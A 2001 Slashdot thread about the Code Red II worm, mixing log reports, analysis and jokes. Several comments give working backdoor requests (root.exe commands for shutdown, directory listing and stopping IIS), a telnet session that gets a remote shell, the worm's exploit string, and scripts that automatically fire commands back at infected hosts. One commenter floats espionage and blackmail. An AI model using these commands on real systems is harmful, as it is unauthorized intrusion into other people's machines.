Code Red Back For More

Brian Stretch writes: "The Code Red II worm was unleashed early this morning and appears to be very different than the original and far more dangerous. CR2 infected servers only attack servers within their Class A address block and their Class B address block in particular: since 9:11am EST I've logged 148 CR2 attack attempts, 89 of which are from within my Class B subnet, suggesting that only servers within Class A networks that were deliberately seeded are being attacked. The 24.x.x.x range is one of the hardest hit, and as before, it's folks with cable modems and DSL connections that are providing the most victims." Several @home customers have written about slowed service today, but they're definitely not alone.

Re:test

[tulare]

Click on "Reply to this" just below the story. If you are wanting to submit a story, well... good luck!

Re:cisco 675 hanging.

[ZanshinWedge]

Nope, there's a better solution. You want to use NAT to redirect port 80. For example, telnetting into the ol' cbos, you'd type something like:

set nat enable
set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
write
exit


Or, you could add a filter to deny incoming traffic on port 80.

Cisco 675 CBOS version 2.4.2

[Futurepower(tm)]

I can handle a limited number of requests.

I'm running 2.4.2 with no hangs. Cisco made me jump through hoops to get the upgrade.

Anyone from Cisco know why Cisco makes it so hard for customers?

Re:It's not safe to install IIS while on a network

[tswinzig]

Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

Interesting dilemma... how exactly are these people going to get the patches to be installed with the system unplugged? Microsoft is going to have to release a patch CD.

Heh... while we're about it

[GC]

I felt I was missing the fun... so I decided to open up a port on my firewall and check for some attack attempts...

It took only ten minutes before /var/log/apache/access_log came up with:

213.123.150.110 - - [05/Aug/2001:14:12:16 +0100] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 281

Blimey... 10 minutes! This thing is rife!!!

And yes that machine is in the same class B network as myself. His ping time latency is over 500ms though... (that was at the time of the scan. Normal latency is around 20-50ms).

Re:Will this wake peoiple up?

[mpe]

There are just too many IIS installations that are run by people who either don't know what they are doing or worse don't even know what IIS or a web server is. That's the problem with these "idiot-proof" GUI webservers...they can be run by idiots.

It certainly dosn't help that it can take more effort to not install IIS.

Re:cisco 675 hanging.

[drsoran]

Anyone with a Cisco Smartnet contract should be able to download the 2.4.2 image for the 67x series. It's up there on the CCO. If your ISP doesn't have a contract you should suggest that they get one if they are going to continue to support Cisco products. If they use Cisco routers and/or switches they may already have one. Try asking.

Not 'Hacked by Chinese?'

[cybermage]

I've gone and hit the addresses showing up in my logs and I haven't seen the tell-tale 'Hacked by Chinese' message. Seems like the new Code Red also leaves the default site at the IP address alone, making it less obvious that a server is infected. Joy.

Re:If this can't break Microsoft's back nothing wi

[Tackhead]

> My microwave doesn't blue screen and cook my brain inside out.
>
> SO WHY THE HELL IS THE CORE FUNCTIONALITY OF MY PC allowed to distribute my personal information, crash during critical functionality, be succeptable to cracks and attacks that are easily preventable.

For his track record of trading security for market share, I'm just as happy as any Slashdotter to see Bill Gates' nuts roasted over a fire until they pop.

But the fact is, your PC - whether it runs CP/M, BeOS, FreeBSD, Linux, or Windows XP - is fundamentally different from embedded systems like your microwave and your car.

Design flaws can exist - in medicines, in consumer products, in closed-source applications, and yes, in open-source applications.

The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

The reason it's "allowed" to crash is the same reason automobiles are "allowed" to crash -- sometimes it's a design flaw (Code Red IIS exploit, BIND exploit, Ford Pinto gas tank that exploded on rear impact), and sometimes it's operator error (SirCam worm, drunk driver).

> I hope no one keeps personal, private, confidential and financial data on there pc's.

The only truly secure machine is the one that's been unplugged, powered down, encased in concrete, wrapped up in a Faraday cage, and then dropped into the Marianas Trench. Ya gotta do what ya gotta do.

Re:A few more details:It's a root trojan

[Malcontent]

I can't believe people trust their businesses to this crap. That's just too funny.

Re:the real kicker is

[clifyt]

No, I don't think I did.

You are right, a well set up unix box takes little time to administer if you leave it static. That is the point. What if your client decided they needed to find a distributed FAX server for their office. Its dead simple to find this stuff and install it and thats what they are looking at. They can call me in for my $75 an hour and end up paying far more in the 3 hours I'm there, and the 5 hours I took to research this stuff...not including fielding the service calls when their secretary needs trained how to use it...than if they would have had the secretary use some of her downtime to do a search for FAX SERVER and WINDOWS NT and find something that worked reasonably well. One of the more technical folks in the office slaps in the card, installs the software and then they call me to come in and do a tweek here or there or ask me if the software looked good in the first place.

The fact is computers don't need to be 99.999 for most businesses. I DO know what you mean though: My biz partner whom handles most of the creative aspects of the biz, didn't even know that 3 of our boxes we had sitting in our racks were Unix based. All he knew was that these were the machines that he never had to touch. He knows all about Windows as he's had to futz with them all the time. Give him unix and he'd be lost...even if ya threw him into KDE or Gnome (two things you'd never see on any of my servers).

Again, admining a Unix box CAN be cheaper and takes less time, but when I get around to an office once a month, that ain't going to cut it when then need new users added to the system and mail accounts set up...how about a new CGI installed for the webserver...that sorta stuff. Having a geek on call would be perfect, but the cost of a fulltime windows person is still going to be far cheaper than a part time unix person that knows what they are doing.

Remotely disabling root.exe justifiable?

[rnt]

I'm still doubting if I will run something like this on my machines:

tail -f /var/log/httpd/access_log|gawk '/default.ida/ {system("echo GET /scripts/root.exe?/c+ren+root.exe+root.exe-worm HTTP/1.0|nc "$1" 80")}'

In theory (I haven't tested it yet) this should rename the root.exe to something else, at least disabling that particular exploit on the machine.

Messing with other people's machines is a Bad Thing(tm) as far as I'm concerned. On the other hand, if people can't be bothered with keeping their software up to date and are causing inconvenience for other people...

This root.exe might be a stepup for causing even more problems at a later time!

Argh, that poses a bit of a moral dilemma for me...

Re:Remotely disabling root.exe justifiable?

[SuiteSisterMary]

Let me clarifiy this a bit. The worm creates two more web directories, which point to the root of C drive and, if it exists, the root of D drive.

Re:Remotely disabling root.exe justifiable?

[baptiste]

Well, no that won't fix it completely - turns out there are a few virtual exploits they put in. From teh recent analysis:

Basically the above code creates a virtual web path (/c and /d) which maps /c to c:\ and /d to d:\. The writer of this worm has put in this functionality to allow for a backdoor to be placed on the system so even if you remove the root.exe (cmd.exe prompt) from your /scripts folder an attacker can still use the /c and /d virtual roots to compromise your system. The attacks would basically look like:

http://IpAddress/c/inetpub/scripts/root.exe?/c+dir (if root.exe was still there) or:
http://IpAddress/c/winnt/system32/cmd.exe?/c+dir Where dir could be any command an attacker would want to execute.

As long as the trojan explorer.exe is running then an attacker will be able to remotely access your server.

Man whoever did this put some thought into it.

In my honor too ...

[CodeRed]

Errrr.... More things named in my honor... This can't be good!

If worms start popping up with Linux4Green (my ICQ nick) then I know I'm bad luck. :-P

Re:In my honor too ...

[DickBreath]

I wish I could have a virus/worm named after me.

Re:In my honor too ...

At least your name isn't Michael Bolton!

Your name is Michael Bolton? Wow, like the singer guy?
Yes, and it's just a coincidence.
So do you like his music?

Re:In my honor too ...

[FauxPasIII]

FWIW, it's actually named by the guys who disassembled it after the yummy Mountain Dew beverage. From the bugtraq post:

We've designated this the .ida "Code Red" worm, because part of the worm is
designed to deface webpages with the text "Hacked by Chinese" and also
because code red mountain dew was the only thing that kept us awake all last
night to be able to disassemble this exploit.

A few more details

[ryanr]

It doesn't affect its own netspace exclusively. Initial analysis indicates that it will do so 6 out of 7 times. The 1 out of 7 will go outside its network range.

We'll have full details posted to the Incidents list shortly.

Re:A few more details

[ryanr]

Took longer than expected (plus I slept a bit in there.. long night :) )

http://www.securityfocus.com/archive/75/201878
http://www.securityfocus.com/archive/75/201877

Re:A few more details

[ShavenGoat]

Apparently the New worm doesn't really kill off the new worm. I was trying the telnet port 80 thing on a machine that was infected with V2.0, which address was in my logs.

When I went to telnet, the backdoor didn't work and I got the "Hacked by chinese" message.

Either the worms over write each other, or a machine can be infected by BOTH worms.

Re:A few more details

[dillon_rinker]

Go to www.eeye.com. They did some extensive analysis of the worm's code.

Re:A few more details

[nebby]

I haven't done any analysis of the worm myself, but has anyone questioned the possibility that this new version is phase two of the original worm? Not the same code per say, but perhaps the old code red does something to tell the new code red to "come here" or something?

The fact the old code red is turned off tells me that they might be linked to the same person/organization or something.. if I were some independant cracker I wouldn't bother getting rid of the old one since that's another thing which might break when I launch the new worm.

Re: A few more details

[mutende]

The new one may still go unnoticed. For some reason "NNNN" generated a malformed URL error in the logs. The new one simply generates a file not found error.

The new one, the "XXXX" type, also generates a malformed URL -- just like the "NNNN" type does -- the malformedness being the double space between the "=a" and the "HTTP/1.0" parts.

Re:Free r00t for all!

[Malcontent]

Well I was thinking more along the lines of.

Industrial espionage, identity theft, blackmail, and general deltree /Y mayhem but whatever floats your boat. The last thing I'd want to do would be actually fix the idiots system.

Re:Now that is funny!

[sharifi]

I tried to visit some of the infected sites in my web log, but most of them gave no response, until I got to http://202.81.246.51 which states: "If you can see this, it means that the installation of the Apache web server software on this system was successful." :)

Re:Ooops bad paste. Take two.

[cyberdonny]

Actually, root.exe is just a copy of cmd.exe, as can be seeing by running a dir on c:\winnt\system32\cmd.exe. The different sizes of cmd.exe probably just mean that this is a slightly different version (service pack) of windows, that's all.

Re:@home preventative measures

[IronChef]

In my area, @home can't tell what's out. It takes many hours for an outage to make it onto "the board." If you call before this time, they will make you reboot the computer, reset the modem, etc etc. and then they will schedule a tech to come out. Because, again, let me repeat myself: they have no ability to monitor the network in real-time. I am comvinced that "the board" only shows outage data that they collect from outraged customers.

(side note: the idiot techs always make you reboot... even though the modem's ability to sync to the network has NOTHING TO DO with the kind of computer it is attached to, or even indeed if the computer is ON or OFF. Sigh.)

@home is a freaking circus. A monkey house.

I actually prefer it that way, they are apparently too dense to notice all the servers I run in violation of the TOS.

Which port to telnet to?

[Sanity]

My machine has received over 250 hits in the last few hours. I have tried to telnet to them (prot 25) but most are connection refused. Which port are you supposed to telnet to, and what do you say?

Re:URM. Thjs is NOT good. GG Microsoft

[kilrogg]

Is there a "shutdown -h now" equivalent with windows?

Re:me too

[mcleodnine]

Several @home customers have written about slowed service today, but they're definitely not alone.

Should read: Several @Home users reported that everything was moving along normaly. Most of thier friends giggled and left the room.

Re:a quick fix

[Saint+Aardvark]

Fuck me...read a little farther down where it says that, based on random scans of the 359k IP addresses infected last time 'round, they estimate that thirty percent are still infected!

What the fuck? What the fuck is going on? How the fuck is it that I can have old ladies calling me up at work (tech support for an ISP) and asking if the reason they can't pick up their email is because of the Code Red worm, 'cos they saw the press conference and, hey, they're wondering, and something like 105,000 separate IP addresses are still infected? Did the rapture happen when I wasn't looking, and God took the people responsible for these computers, those left behind couldn't find the passwords anywhere? How is this possible?

(I know, I know; not everyone lives w/in viewing distance of CNN, default installations of MS whatever -- but still, this absolutely amazes me.)

My subnet is hit

[wilkinsm]

I'm on a /128 cox at home subnet. It's normally very quiet on my subnet, but since this morning it's my firewall has been bouncing packets like crazy.

I'm guess I'm going to have to put a packet sniffer on the other side of the wall and see what the hell is going on with this code red II.

Re:My subnet is hit

[matthewg]

Wow, Cox has deployed IPv6 already? ;)

Microsoft or security...

[fanatic]

...Pick any one.

Re:Why don't they...

[Genom]

Easy. Make it so it isn't a true "worm".

Make it so it patches against the exploit, then routes all attempted re-exploitation to a small CGI that uses the backdoor to disinfect the attacking system, and install the countermeasure.

So...assuming you're getting hit with 30 requests an hour from 30 different IPs -- and each of those 30 is getting hit the same way -- the "fix" could propagate itself like wildfire, without being an "active" worm (seeking out hosts to disinfect), but instead being a "passive" worm (waiting for an infected computer to contact it, then disinfecting that computer, and passing on the "passive" disinfector).

Problem being, it's still modifying the data on someone else's computer, without their knowledge or permission. I believe that makes it illegal -- even if it is working for "good" rather than for "evil".

Release management

[cyberdonny]

Actually, the three variants of the initial worms (1 with broken random number generator, 2 with a fixed one) can be considered roughly the same release. Indeed, apart from the obvious fixes, most code was rigourously identical. So, let's call those 1.0, 1.1 and 1.2. However this one is entirely different, apart from the exploit it uses, and the name CodeRedII. Thus the use of version 2.0 does seem to be justfied.

Re:Promise me you'll only use this for good.

[nebby]

Holy shit.

In the root directory of the drive there's an HTML file with the "Fuck USA goverment" tag or whatever. I am not doing anymore snooping.

The shit has hit the fan, ladies and gents.

Trained Monkey

[Greyfox]

So you see, with Automatic Volume Recognition your operators can pre-mount labelled tapes on any online tape drive and they'll be allocated to the correct jobs. But this doesn't mean you can hire CHIMPANZEES to run your systems!...
- IBM Instructor -- "Introduction to System/360," circa 2Q 1966

Yeah, it's much harder to install Apache. You have to remember how to type "apt-get install apache". Fortunately the Debian people tend to stay pretty well ahead of the security issues, so if you apt-get update ; apt-get upgrade on a regular basis, any newly discovered vulnerabilities will get fixed. Not that Apache's had any major vulnerabilities in a long, long time. Maybe the solution would be to port apt to Windows...

CodeRedNeck

[RoyalTS]

Check out this heise.de article (in German, sorry)!!! Somebody apparently programmed a little Linux tool that may be able to slow the spread of the worm down a little. The idea was first introduced in the incidents.org forum. May be worth a look.

People who don't know they are running IIS

[Proud+Geek]

Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.

Re:People who don't know they are running IIS

[throx]

FYI, Win2k Professional also runs IIS and would be susceptible to this attack if it is enabled (and unpatched).

Re:People who don't know they are running IIS

[throx]

You are wrong.

Go to "Add/Remove Programs" in "Control Panel" (which should be on your Start Menu). Click on "Add/Remove Windows Componenets". The second item on the list will be "Internet Information Services (IIS)".

I didn't pirate anything - they come on my MSDN subscription. Perhaps you should check your facts a little before you post and make an utter fool of yourself?

You should now go around all those Pro machines you installed and remove the code red worm from them - it's admins like you that cause these things to spread in the first place. I can't believe you didn't even know what you were installing!!

As for "no servers on Pro" - don't be so stupid and ignorant. File and Print obviously is installed, IIS is installed (as you now know) and you can install other things like MMQ, SMTP, FTP and a whole stack of others if you want.

Re:People who don't know they are running IIS

[einhverfr]

Someone should tell all those idiots out there who pirate Windows 2000 that they should pirate "Windows 2000 Workstation" and not "Windows 2000 Server" because they're all going to get themselves own3d that way.

Well, not so fast. Many people select the wrong option at install on Win 2k pro and run IIS on those machines unknowingly as well.

Re:MSNBC Coverage

[tswinzig]

Yikes... their opening sentence does not bode well for the technical content in the rest of the article...

"IT WAS NOT IMMEDIATELY clear if the new worm was a variant of Code Red or just a nastier copycat..."

Mmmkay...

Re:The solution ?

[pirodude]

might I suggest doing root.exe last? you dont wanna close yout hole for fixing the stuff :)

Of course...

[Jason+W]

If you get tired of seeing the requests, you could always shut the server down (the requesting server of course, not yours :).

Might not remove the worm, but at least gets the "admin" (ha) to pay some attention. Maybe make a request for YOU_HAVE_THE_CODE_RED_WORM_YOU_MORON.HTML right before you do it in case they check the logs :)

Re:Source?

[ksheff]

Why not use the sort mentioned in the paper by Uri Guttman and Larry Rosler? It was made for this.

print join "\n", map substr($_, 4) => sort map pack('C4' => /(\d+)\.(\d+)\.(\d+)\.(\d+)/) . $_ => @ip;

From the Windows 2000 EULA

[Waffle+Iron]

This Limited Warranty is void if failure of the Product has resulted from accident, abuse, misapplication, abnormal use or a virus.

Interesting.
Also...

Some states/jurisdictions do not allow the exclusion or limitation of incidental or consequential damages, so the above limitation or exclusion may not apply to you.

Does this really mean anything? Could somebody in some state conceivably sue them successfully? The rest of the EULA is an absolute, complete, iron-clad denial of any liability whatsoever. This last sentence is the only shred of hope I could find.

OTOH, be careful what you wish for. The GPL has similar disclaimers...

Re:From the Windows 2000 EULA

[rgmoore]

The status of the disclamers in any EULA is a legal gray area. There just isn't enough case law to be really confident about just how much would fly in court. It's my understanding that some of the things they're trying to disclaim (like the limitation on incidental and consequental damages, or voiding of implied warrant of merchantability) can't be disclaimed even if the buyer wanted to disclaim them for some reason. Of course finding out in court which things were and weren't legal could be pretty interesting and expensive in legal fees. Part of the goal of UCITA was to change the law so that those ridiculous disclaimers would be legally defined to be correct- software merchants would be allowed to disclaim any liability they felt like. That's why it's such a bad idea.

Re:From the Windows 2000 EULA

[Waffle+Iron]

Are you implying that people who write GPLed code should give away software *and let people sue them* if it doesn't work right?

No. I'm saying that if someone manages to collect from MS regarless of what their EULA says, then free software authors could theoretically face similar liablilities regardless of what the GPL says. It's just an observation.

I made a rookie mistake in my story submission

[Brian+Stretch]

It just occurred to me to look up the definition of Class A/B/C addresses, and yup, I used the terms wrong in my story submission (argh!). What I meant to say was that when the worm generates addresses to scan, it appeared to always keep the first octet and a little over half the time (137 of 224 scans in my case) it keeps the second octet as well. That's no longer precisely true: I've since logged one scan from 152.72.x.x (grep XXXX access_log | grep -v 24.). And the high number of scans from within the first two octets may have more to do with that being a block of cable modem addresses rich in vulnerable IIS machines than anything else.

And now we know these poor bastards have been rootkitted. There has to be a way to use this to warn them?

Re:If this can't break Microsoft's back nothing wi

[SlashGeek]

As long as they don't change that to the worth of their software, or $5 US, wichever is more.

Re:If this can't break Microsoft's back nothing wi

[IronChef]

Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.

Re:Zero monkeys, ten minutes

[leonbrooks]

Kickstart disks rule! (-:

I think that if somebody wrote something similar to this for apache, we would get similar results.

Disagree. Apache doesn't answer requests as root, and the apache user (usually nobody, apache or httpd) can't write anywhere useful. IIS answers requests as the kernel. ACLs? What ACLs? Banzaaai!

I also routinely mount /var, /home, /tmp all nosuid,nodev to slow down root exploits, and usually mount /boot and /usr readonly to slow down trojans and speed up fscks if the power vanishes. Not a lot of people do this kind of thing, but it's nice to know that Apache itself isn't very vulnerable, and what I'm doing is basically insurance.

There's also the issue of change and diversity. For example, older Apaches tend to default to /home/httpd/... and newer ones to /var/www/... (and who knows where Slackware would put it?) which would trip over hard-coded paths in attack kits. Likewise, many modern Apache installs (e.g. Mandrake) tend to use virtual hosting for everything. Relying on a specific module, or on the state of a specific feature, would also be a loser. Microsoft == monoculture == fragile.

Mandrake installed in a server configuration does start a web server (and other things), but it specifically tells you about it during installation, and you have to click [Yes] to make it happen. They also do things like starting with ALL:ALL:DENY in hosts.deny, meaning that even with services running, a crackers' hope is likely end in futility. Many packagers are following suit.

Debian's automatic updates also take the dodo-or-busy sysadmin out of the loop. Mandrake, RedHat and others are following suit.

Summary: no, we wouldn't. Even though there are twice as many Apache sites as IIS. OTOH if M$ also had 95% penetration of the web server market, the Internet as we know it would be history by now.

Re:Why don't they...

[joshwa]

where are my mod points when i need them??

Re:All I want to know is

[Maditude]

...and I want to know if I'll get spanked for sending my log (367 entries and growing quite quickly) of these default.ida? requests to abuse@microsoft.com ;-)

Re:If this can't break Microsoft's back nothing wi

[Tackhead]

> Essentially, a capability is permission to do something: see a file, read it, delete it, execute it, open a network connection. In such an OS, the web server is giving capabilities to: see everything in its docroot; execute everything in it cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use. It's a very interesting concept.

Sounds a bit like the way they're going with SELinux. And yeah, a capability-based OS would rock. Sadly, neither contender for market share (be it any version of 'doze or the various UNIXes/Linuxes) has it yet :(

For those of you with the free time and desire to write code to make the world a better place, it'd be a hell of a good project to get involved with.

Re:It's certainly more ambitious...

[raju1kabir]

I've had the opposite experience. I got over 60 hits in the first round of the Code Red worm, and 32 from this round tonight.

It depends on your machine's neighbors. If it's in a subnet with a lot of vulnerabe Microsoft machines, it's going to get hammered. If it's in a well-run subnet, it will only see the odd random probes.

Machines I have in colo centers with small numbers of IPs (backup name servers, etc.) are really getting the treatment. Likewise the servers in a UUnet /26 (so presumably someone else in the Class C is an MS shop - never imagined I'd care). The rest of the stuff, in scattered /24s, is not seeing much of it at all (usually 5 or 6 log entries at this point).

Re:Rooted? Lemme get this straight....

[david+duncan+scott]

I prefer the thing I've heard pool players say. It's a combination shot, so they "combinate".

Re:logs

[GC]

That's really nice!

Here are my logs: here.

Only 34 so far, but I only decided to open up apache to these this afternoon...

Cheers for that!

Re:Do what I did...

[Ranger+Rick]

Already done it (well, not crashing, but I email hostmaster@their.domain), just do:

AddHandler cgi-script .ida

In your httpd.conf and make a little perl script or something called default.ida to log it. It's been great fun, shoulda been to bed hours ago, but I'm playing around with my script instead. =)

There's probably a phase III

[Animats]

This is a virus that installs a root kit. The question is, why? Clearly this is in preparation for a next phase. Sysadmins need to be thinking ahead on this.

Re:logs

[Genom]

311 here, linux server also running apache =)

shutting down those machines

[valentyn]

It would be quite easy to shut down those PCs, if there were a "shutdown" command on NT/2k. There isn't; there is one in the Resource Kit but not in the default installation.

Having said that, you could kill off a Windows PC by issueing

GET /scripts/root.exe?/c+SHUTDOWN

Other commands are possible as well: GET /scripts/root.exe?/c+dir+/s+\ gives you the recursive directory tree. Formatting, starting Fdisk and the like are possible, too.

If someone could post a shutdown.exe somewhere, I'll be glad to provide a simple script that downloads the executable and starts it, thus stopping the IIS machine. Or maybe this is our chance to create Tuxissa :)

Re:shutting down those machines

[SuiteSisterMary]

GET /scripts/root.exe?/c+net+stop+"World+Wide+Web+Publ ishing+Service" should shut down IIS. net stop "World Wide Web Publishing Service" is the functional equivalent of '/etc/rc.d/init.d/httpd stop' on Linux and various UNIXs.

Re:Why don't they...

[rawg]

This will not work. How is your worm going to spread if you fix the system?

Re:If this can't break Microsoft's back nothing wi

[tswinzig]

Unlike a car that explodes to a design flaw, software that explodes due to a design flaw seems to be immune to the civil justice system.

You left out some key facts:

- Operating systems are more complex than cars.
- Operating systems don't require a license to be operated.

Re:What are you talking about?

[sunhou]

• One time out of eight, and entirely random IP address is generated
• Four times out of eight, the lower octet of the IP address is randomized (192.168.1.X)
• Three times out of eight, the lower two octets are randomized (192.168.X.Y)

This is very interesting. I've recently been studying spatial population models of dispersal, e.g. when trees release seeds, should they go a short distance or a long distance? I.e. which will make them more likely to survive, and what combination of strategies will be evolutionarily stable?

Short-distance dispersal is best on aggregated landscapes, where good habitat is likely to be nearby, although such strategies end up competing with themselves quite intensely. Long-distance dispersal is good on unclustered landscapes, where you're better off hoping to colonize a good site far away. But it turns out that mixed seem to really kick butt; they exploit local rich patches of resources, but an occasional long-distance propagule allows them to colonize far-off patches once in a great while, and also reduces intraspecific competition somewhat.

It would be really interesting seeing a few different Code Red's going with different proportions of near versus far dispersal, to see which one does best. It would tell us something about the aggregation of exploitable machines on the net. Although I suppose some people may object to such a study.

As an AC pointed out in another reply, the really clever thing to do would be to have an adaptive strategy with a bit of randomness in it (i.e. the parameters in the strategy are changing too). That way, it would eventually "find" the strategy that works best, and in fact different subpopulations could converge to different locally optimum strategies.

Re:Hypothesis

[SuiteSisterMary]

Nah, it's a country wide civic holiday, so it'll have different names in different areas.

Re:A few more details:It's a root trojan

[Soko]

From this thread on Ars Technica:

Just discovered something interesting...
telnet 80

type GET /scripts/root.exe HTTP/1.0

and you have a command prompt..

Like this:
[root@server httpd]# telnet 24.xxx.xxx.xxx 80
Trying 24.xxx.xxx.xxx...
Connected to 24.xxx.xxx.xxx.
Escape character is '^]'.
GET /scripts/root.exe HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 07:45:08 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

[This message was edited by The_Hitman on August 05, 2001 at 03:56.]

Re:Server 403's

[Cato]

A couple of possibilities:

- the infected servers are just DoSed by the number of people scanning them back on a small connection

- IIS is actually running on WinNT/2K Workstation, which has a limit of something like 10 concurrent inbound TCP connections (exacerbated by HTTP/1.1, used by most browsers these days).

CRII root opening new ports?

[RatOmeter]

I'm gonna check the "well-known numbers" RFC, but
I did a little scan of one of the infectoids:
Ports open at:
21
25 (open mail relay too!)
80
135
139
443
445
1025
1027
2057
2162
2174
2200
2210
2214
2219
2227
2228
2257
2282

I recogize some of those ports, but surely
windows doesn't need all those ports open?

Re:URM. Thjs is NOT good. GG Microsoft

[nyet]

If somebody had deep linked versions of these via ftp, we could write a white hat worm easily.

Anybody have ftp deep link equivalents of:
http://download.microsoft.com/download/winntsp/Pat ch/q300972/NT4/EN-US/Q300972i.exe

Writing a worm to wget those would be a bitch, but ftp comes installed on all NT boxen... so its easy

and

href="http://download.microsoft.com/download/win20 00platform/Patch/q300972/NT5/EN-US/Q300972_W2K_SP3 _x86_en.EXE

Re:Why is PWS (IIS 4) on Windows 98 not vulnerable

[baptiste]

Actually, from what I've read, CodeRedII will only infect on Win2K. From the analysis email on BUGTRAQ:

This worm, like the original Code Red worm, will only exploit Windows 2000 web servers because it overwrites EIP with a jmp that is only correct under Windows 2000. Under NT4.0 etc... that offset is different so, the process will simply crash instead of allowing the worm to infect the system and spread.

But I'm sure someone will create various flavors with teh right jump points to hit all the IIS variants. Only a matter of time.

The request

[ConsumedByTV]

Here is the request I was hit with:

"GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0"

So does this do anything differently?

Re:The request

[ConsumedByTV]

I just put up a request sent to my webserver, Not a virus. After all its a http get request. Microsoft is the one that made it into a virus!

Code Red - the soda pop - sales take off!

[MyMomIsALinuxHacker]

Taken from http://www.securitynewsportal.com/article.php?sid= 1354&mode=thread&order=0

Code Red--the soda--has been spreading almost as fast as its namesake computer worm, which has infected hundreds of thousands of computers to date. The caffeine-laden, cherry-flavored version of its pale-yellow cousin, Mountain Dew, was released in May, months before the Code Red worm threatened to clog Internet traffic. And as computer security experts work to contain the damage from the Code Red worm, the soda's maker, Pepsi, is coincidentally featuring a "Crack the Code" contest on the Mountain Dew Web site.

Code Red has been an especially big hit with computer programmers, who often guzzle the high-octane drink to fuel late-night code-writing sessions. Among the drink's fans were the staff of eEye Digital Security, who say they identified the Code Red worm and named it after their favorite soda..

The rest of the story can be found on http://www.securitynewsportal.com/article.php?sid= 1354&mode=thread&order=0 .

Its funny. Laugh. Please?

Re:Something that should happen more often.

[Tackhead]

> Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

I hereby propose we adopt your post as a convention.

We can thus encode "war stories" about the latest [worm/virus/trojan] as follows, saving Slashdot a fortune in bandwidth charges.

For instance, I can now describe my evening as follows:

"IIS. Code Red II. flaw. IIS. doesn't. FreeBSD. 429. worms. thousands. Apache. Apache. FreeBSD. company. worm. 6.2MB."

Re:a quick fix

[Malcontent]

"So after the last 20 root exploits of Linux and Apache, we shouldn't use that either?"

Of course you shouldn't, especially if they happened within a short period of time. Why would you use any insecure system? If linux and apache got rooted as much as IIS you can bet your ass I'd drop it like a hot potato and move on to something else. There must be a thousand web servers out there both open source and commercial anybody who willingly uses an insecure one is just plain stupid at best and criminally negligent at worst.

PHP countermeasure

[l-ascorbic]

On the basis of that, this should work. I'll watch the logs with interest.

<?php
header("HTTP/1.0 400 You cheeky fucker");
?>
<html>
<title>Red Alert</title>
<?php
$fp =fsockopen($REMOTE_ADDR,80,$en,$es,5);
if (!$fp)
{
echo "I tried to disinfect you, but couldn't connect: $es ($en)";
}
else
{
fputs ($fp, "GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0\r\n\r\n");
echo "I tried to disinfect you, and the server started to say:<h2>";
echo $res =fgets($fp,1024);
fclose($fp);
}
$log=fopen("/tmp/redalert.log","a");
fwrite($log,$REMOTE_ADDR . " " . date("r") . " " .$res );
fclose($log);
echo "</h2> $SERVER_SIGNATURE";
?>

Worse than that...any looser has ALL hosts

[braddock]

It's worse than that. I can use the backdoor on the few hosts I am being hit directly with, and get THEIR web logs. If I have 100 hosts that have attacked me, and each of THEM have 100 hosts that have tried to reinfect THEM, etc....

100*100 = 10,000
100*100*100 = 1,000,000 (250,000 is probably the total number of hosts that will be infected, so you'll start getting diminishing returns as you get duplicates)

Re:What are you talking about?

[jonathan_ingram]

Why do you call this pattern bizarre? That's how I'd scan if I wrote a worm: if you manage to infect a computer at a particular IP adress, then you have some evidence that computers 'close' to that one will probably be vulnerable as well, so you attempt to infect 'close' computers more than 'distant' ones.

You keep trying the 'distant' ones every now and then, just in case you get lucky.

Re:Something that should happen more often.

[IKEA-Boy]

While this is a remote exploit, it's not nearly as severe as the default.ida one on IIS. The apache exploit can be used to gather directory listings etc. and does NOT allow arbitrary code to run.

Re:Free r00t for all!

[Malcontent]

"Now that they have the backdoors, though, how hard would it be to patch them remotely?"

Why bother? can't you think of more interesting things to do with their computer?

Re:Proposal for White Hat'ing CR][

[Spoing]

